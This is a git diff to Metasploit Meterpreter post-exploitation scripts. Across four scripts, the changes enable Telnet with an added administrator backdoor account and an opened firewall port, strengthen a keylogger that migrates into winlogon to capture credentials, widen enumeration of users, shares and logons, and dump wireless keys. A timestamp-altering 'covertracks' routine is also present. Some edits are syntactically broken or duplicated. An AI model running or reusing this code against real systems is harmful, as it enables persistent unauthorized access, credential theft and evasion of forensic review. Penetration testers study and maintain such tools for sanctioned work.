diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb index 79196b4c05..86b3ff9646 100644 --- a/scripts/meterpreter/gettelnet.rb +++ b/scripts/meterpreter/gettelnet.rb @@ -1,201 +1,212 @@ -#!/usr/bin/env ruby -# -#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista -#Windows 2008 and Windows XP targets using native windows commands. -#Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.1.1 +#!/usr/bin/env ruby +# +#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista +#Windows 2008 and Windows XP targets using native windows commands. +#Provided by Carlos Perez at carlos_perez[at]darkoperator.com +#Verion: 0.1.2 #Note: If the Telnet Server is not installed in Vista or win2k8 -# it will be installed. -################## Variable Declarations ################## - -session = client -@@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu." ], - "-e" => [ false, "Enable Telnet Server only." ], - "-p" => [ true, "The Password of the user to add." ], - "-u" => [ true, "The Username of the user to add." ] - ) -def checkifinst(session) - r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ (/TlntSvr/) - return true - end - - end - r.channel.close - r.close -end - -#------------------------------------------------------------------------------- -def winver(session) - stringtest = "" - verout = [] - r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) - while(d = r.channel.read) - stringtest << d - end - r.channel.close - r.close - - verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) - version = nil - if verout[0] == "6" - if verout[1] == "0" - version = "Windows Vista/Windows 2008" - elsif verout[1] == "1" - version = "Windpows 7" - end - elsif verout [0] == "5" - if verout[1] == "0" - version = "Windows 2000" - elsif verout[1] == "1" - version = "Windows XP" - elsif verout[1] == "2" - version = "Windows 2003" - end - end - version -end - -#--------------------------------------------------------------------------------------------------------- -def insttlntsrv(session) - trgtos = winver(session) +# it will be installed. +################## Variable Declarations ################## + +session = client +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-e" => [ false, "Enable Telnet Server only." ], + "-p" => [ true, "The Password of the user to add." ], + "-u" => [ true, "The Username of the user to add." ] + ) +def checkifinst(session) + r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ (/TlntSvr/) + return true + end + + end + r.channel.close + r.close +end + +#------------------------------------------------------------------------------- +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end + +#--------------------------------------------------------------------------------------------------------- +def insttlntsrv(session) + trgtos = winver(session) if trgtos =~ /(Windows Vista)/ if checkifinst(session) print_status("Telnet Service Installed on Target") - else - print_status("Installing Telnet Server Service ......") - session.response_timeout=90 - r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - r.channel.close - r.close + else + print "[*] Installing Telnet Server Service ......") + session.response_timeout=90 + r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true}) + sleep(2) + prog2check = "pkgmgr.exe" + found = 0 + while found == 0 + session.sys.process.get_processes().each do |x| + found =1 + if prog2check == (x['name'].downcase) + print "." + sleep(0.5) + found = 0 + end + end end - end - end - -#--------------------------------------------------------------------------------------------------------- -def enabletlntsrv(session) - tmpout = [ ] - cmdout = [] - key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr" - root_key2, base_key2 = session.sys.registry.splitkey(key2) - value2 = "Start" - begin - open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ) - v2 = open_key.query_value(value2) - print_status "Setting Telnet Server Services service startup mode" - if v2.data != 2 - print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." - cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] - cmmds. each do |cmd| - r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - end - else - print_status "\tTelnet Server Services service is already set to auto" - end - #Enabling Exception on the Firewall - print_status "\tOpening port in local firewall if necessary" - r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - rescue::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end -end -#--------------------------------------------------------------------------------------------------------- -def addrdpusr(session, username, password) - tmpout = [ ] - cmdout = [] - print_status "Setting user account for logon" - print_status "\tAdding User: #{username} with Password: #{password}" - begin - r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - print_status "\tAdding User: #{username} to local group TelnetClients" - r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - print_status "\tAdding User: #{username} to local group Administrators" - r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - print_status "You can now login with the created user" - rescue::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end -end -#--------------------------------------------------------------------------------------------------------- -def message - print_status "Windows Telnet Server Enabler Meterpreter Script" + r.channel.close + r.close + print_status("Finnished installing the Telnet Service.") + end + end + end + +#--------------------------------------------------------------------------------------------------------- +def enabletlntsrv(session) + tmpout = [ ] + cmdout = [] + key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr" + root_key2, base_key2 = session.sys.registry.splitkey(key2) + value2 = "Start" + begin + open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ) + v2 = open_key.query_value(value2) + print_status "Setting Telnet Server Services service startup mode" + if v2.data != 2 + print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." + cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] + cmmds. each do |cmd| + r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + end + else + print_status "\tTelnet Server Services service is already set to auto" + end + #Enabling Exception on the Firewall + print_status "\tOpening port in local firewall if necessary" + r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def addrdpusr(session, username, password) + tmpout = [ ] + cmdout = [] + print_status "Setting user account for logon" + print_status "\tAdding User: #{username} with Password: #{password}" + begin + r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group TelnetClients" + r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group Administrators" + r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "You can now login with the created user" + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def message + print_status "Windows Telnet Server Enabler Meterpreter Script" end def usage - print( - "Windows Telnet Server Enabler Meterpreter Script\n" + - "Usage: getgui -u -p \n" + - @@exec_opts.usage + print( + "Windows Telnet Server Enabler Meterpreter Script\n" + + "Usage: getgui -u -p \n" + + @@exec_opts.usage ) -end -################## MAIN ################## -# Parsing of Options -usr = nil -pass = nil -lport = nil -enbl = nil -@@exec_opts.parse(args) { |opt, idx, val| - case opt - when "-u" - usr = val - when "-p" - pass = val - when "-h" - usage - break - when "-n" - lport = val.to_i - when "-e" - enbl = 1 - end - -} -if enbl == 1 - message - insttlntsrv(session) - enabletlntsrv(session) - -elsif usr!= nil && pass != nil - message - insttlntsrv(session) - enabletlntsrv(session) - addrdpusr(session, usr, pass) - -else - usage -end - +end +################## MAIN ################## +# Parsing of Options +usr = nil +pass = nil +lport = nil +enbl = nil +@@exec_opts.parse(args) { |opt, idx, val| + case opt + when "-u" + usr = val + when "-p" + pass = val + when "-h" + usage + break + when "-n" + lport = val.to_i + when "-e" + enbl = 1 + end + +} +if enbl == 1 + message + insttlntsrv(session) + enabletlntsrv(session) + +elsif usr!= nil && pass != nil + message + insttlntsrv(session) + enabletlntsrv(session) + addrdpusr(session, usr, pass) + +else + usage +end + diff --git a/scripts/meterpreter/keylogrecorder.rb b/scripts/meterpreter/keylogrecorder.rb index ff81a66388..a2ef1fc82f 100755 --- a/scripts/meterpreter/keylogrecorder.rb +++ b/scripts/meterpreter/keylogrecorder.rb @@ -34,21 +34,15 @@ captype = 0 "-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0."] ) + #Function to Migrate in to Explorer process to be able to interact with desktop -def explrmigrate(session,captype) +def explrmigrate(session,captype,adm) begin print_status("Migrating process...") if captype.to_i == 0 process2mig = "explorer.exe" elsif captype.to_i == 1 - # Check to make sure that process is running and system to be able to migrate to high priv process - if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM") - process2mig = "winlogon.exe" - else - print_status("\tYou are not currently running as System to be able to migrate to winlogon.") - print_status("\tCapturing only logon user keystrokes.") - process2mig = "explorer.exe" - end + process2mig = "winlogon.exe" else process2mig = "explorer.exe" end @@ -70,8 +64,10 @@ end #Function for starting the keylogger def startkeylogger(session) begin + print_status("Grabbing Desktop Keyboard Input...") + session.ui.grab_desktop print_status("Starting the keystroke sniffer...") - client.ui.keyscan_start + session.ui.keyscan_start return true rescue print_status("Failed to start Keylogging!") @@ -125,8 +121,11 @@ def keycap(session, keytime, logfile) end db.close rescue::Exception => e + print("\n") + print_status("#{e.class} #{e}") db.close - print_status("Error: #{e.class} #{e}") + print_status("Stopping keystroke sniffer...") + session.ui.keyscan_stop end end def helpmsg @@ -155,7 +154,8 @@ helpcall = 0 } if helpcall == 0 - if explrmigrate(session,captype) + adm = checkifadm(session) + if explrmigrate(session,captype,adm) if startkeylogger(session) keycap(session, keytime, logfile) end diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb index 5b01ea36d6..2981e04c28 100644 --- a/scripts/meterpreter/remotewinenum.rb +++ b/scripts/meterpreter/remotewinenum.rb @@ -3,7 +3,7 @@ #Meterpreter script for basic enumeration of Windows 2003, Windows Vista # and Windows XP remote targets using native windows command wmic. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.1.1 +#Verion: 0.1.0 #Note: ################## Variable Declarations ################## session = client @@ -39,10 +39,17 @@ wmic = [ 'group list', 'sysaccount list', 'volume list brief', + 'logicaldisk get description,filesystem,name,size', + 'netlogin get name,lastlogon,badpasswordcount', + 'netclient list brief', + 'netuse get name,username,connectiontype,localname', + 'share get name,path', + 'nteventlog get path,filename,writeable', 'service list brief', 'process list brief', 'startup list full', 'rdtoggle list', + 'product get name,version', 'qfe list' ] ################## Function Declarations ################## @@ -75,7 +82,19 @@ def wmicexec(session,wmic,user,pass,trgt) sleep(1) #print_status "\twmic #{command}" r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) - sleep(2) + #Making sure that wmic finnishes before executing next wmic command + prog2check = "wmic.exe" + found = 0 + sleep(2) + while found == 0 + session.sys.process.get_processes().each do |x| + found =1 + if prog2check == (x['name'].downcase) + sleep(0.5) + found = 0 + end + end + end r.close end # Read the output file of the wmic commands @@ -122,6 +141,9 @@ end def winver(session) stringtest = "" verout = [] + tmp = session.fs.file.expand_path("%TEMP%") + wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000)) + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) stringtest << d @@ -133,7 +155,19 @@ def winver(session) version = nil if verout[0] == "6" if verout[1] == "0" - version = "Windows Vista/Windows 2008" + r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true}) + sleep(2) + # Read the output file of the wmic commands + r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + if d =~ /Windows Serverr 2008/ + version = "Windows 2008" + elsif d =~ /Windows Vista/ + version = "Windows Vista" + end + end + r.channel.close + r.close elsif verout[1] == "1" version = "Windpows 7" end diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index 1958a7f5dd..3e224f9dbf 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -1,20 +1,21 @@ #!/usr/bin/env ruby # #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista -# and Windows XP targets using native windows commands. +#Windows 7 and Windows XP targets using native windows commands. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.3.4 +#Verion: 0.3.5 #Note: Compleatly re-writen to make it modular and better error handling. # Working on adding more Virtual Machine Checks and looking at improving # the code but retain the independance of each module so it is easier for # the code to be re-used. #Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions) +# inquis (bernardo.damele 0x40 gmail 0x2E com) (Minor Fixes) ################## Variable Declarations ################## session = client host,port = session.tunnel_peer.split(':') # Create Filename info to be appended to downloaded files -filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) +filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000)) # Create a directory for the logs logs = ::File.join(Msf::Config.config_directory, 'logs', 'winenum', host + filenameinfo ) @@ -47,8 +48,12 @@ commands = [ 'net group administrators', 'net view /domain', 'netsh firewall show config', - 'tasklist /svc' - + 'tasklist /svc', + 'tasklist /m' +] +# Windows 2008 Commands +win2k8cmd = [ + 'oclist', ] # Commands wich MACE will be changed cmdstomp = [ @@ -65,14 +70,21 @@ cmdstomp = [ ] # WMIC Commands that will be executed on the Target wmic = [ - 'computersystem list', + 'computersystem list brief', 'useraccount list', 'group list', 'service list brief', 'volume list brief', + 'logicaldisk get description,filesystem,name,size', + 'netlogin get name,lastlogon,badpasswordcount', + 'netclient list brief', + 'netuse get name,username,connectiontype,localname', + 'share get name,path', + 'nteventlog get path,filename,writeable', 'process list brief', 'startup list full', 'rdtoggle list', + 'product get name,version', 'qfe', ] #Specific Commands for Windows vista for Wireless Enumeration @@ -184,7 +196,7 @@ def wmicexec(session,wmiccmds= nil) tmp = session.fs.file.expand_path("%TEMP%") wmicfl = tmp + "\\wmictmp.txt" wmiccmds.each do |wmi| - print_status "\trunning command wimic #{wmi}" + print_status "\trunning command wmic #{wmi}" r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) sleep(1) r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'}) @@ -193,6 +205,18 @@ def wmicexec(session,wmiccmds= nil) sleep(1) r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true}) sleep(2) + #Making sure that wmic finnishes before executing next wmic command + prog2check = "wmic.exe" + found = 0 + while found == 0 + session.sys.process.get_processes().each do |x| + found =1 + if prog2check == (x['name'].downcase) + sleep(0.5) + found = 0 + end + end + end r.close end # Read the output file of the wmic commands @@ -364,6 +388,22 @@ def regdump(session,pathoflogs,filename) session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'}) end +#------------------------------------------------------------------------------- +# Function for extracting program list from registry +def findprogs(session) + print_status("Extracting software list from registry") + proglist = "" + session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company| + proglist << "#{company}" + + session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software| + proglist << "\t#{software}" + end + end + print_status("Finnished Extraction of software list from registry") + proglist +end + #------------------------------------------------------------------------------- # Function that will call 2 other Functions to cover all tracks def covertracks(session,cmdstomp) @@ -504,6 +544,9 @@ end def winver(session) stringtest = "" verout = [] + tmp = session.fs.file.expand_path("%TEMP%") + wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000)) + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) stringtest << d @@ -515,9 +558,21 @@ def winver(session) version = nil if verout[0] == "6" if verout[1] == "0" - version = "Windows Vista/Windows 2008" + r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true}) + sleep(2) + # Read the output file of the wmic commands + r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + if d =~ /Windows Serverr 2008/ + version = "Windows 2008" + elsif d =~ /Windows Vista/ + version = "Windows Vista" + end + end + r.channel.close + r.close elsif verout[1] == "1" - version = "Windpows 7" + version = "Windows 7" end elsif verout [0] == "5" if verout[1] == "0" @@ -588,13 +643,20 @@ if helpopt != 1 if trgtos =~ /(Windows XP)/ filewrt(dest,list_exec(session,commands)) filewrt(dest,wmicexec(session,wmic)) + filewrt(dest,findprogs(session)) dumpwlankeys(session,logs,filenameinfo) - elsif trgtos =~ /(Windows .NET Server)/ + elsif trgtos =~ /(Windows 2003)/ filewrt(dest,list_exec(session,commands)) filewrt(dest,wmicexec(session,wmic)) + filewrt(dest,findprogs(session)) elsif trgtos =~ /(Windows Vista)/ filewrt(dest,list_exec(session,commands + vstwlancmd)) filewrt(dest,wmicexec(session,wmic)) + filewrt(dest,findprogs(session)) + elsif trgtos =~ /(Windows 7)/ + filewrt(dest,list_exec(session,commands + vstwlancmd)) + filewrt(dest,wmicexec(session,wmic)) + dumpwlankeys(session,logs,filenameinfo) dumpwlankeys(session,logs,filenameinfo) elsif trgtos =~ /(Windows 2000)/ filewrt(dest,list_exec(session,commands - nonwin2kcmd))